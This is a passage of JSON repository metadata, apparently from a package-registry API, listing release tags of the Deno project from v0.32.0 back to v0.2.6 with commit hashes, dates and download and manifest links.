2-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/r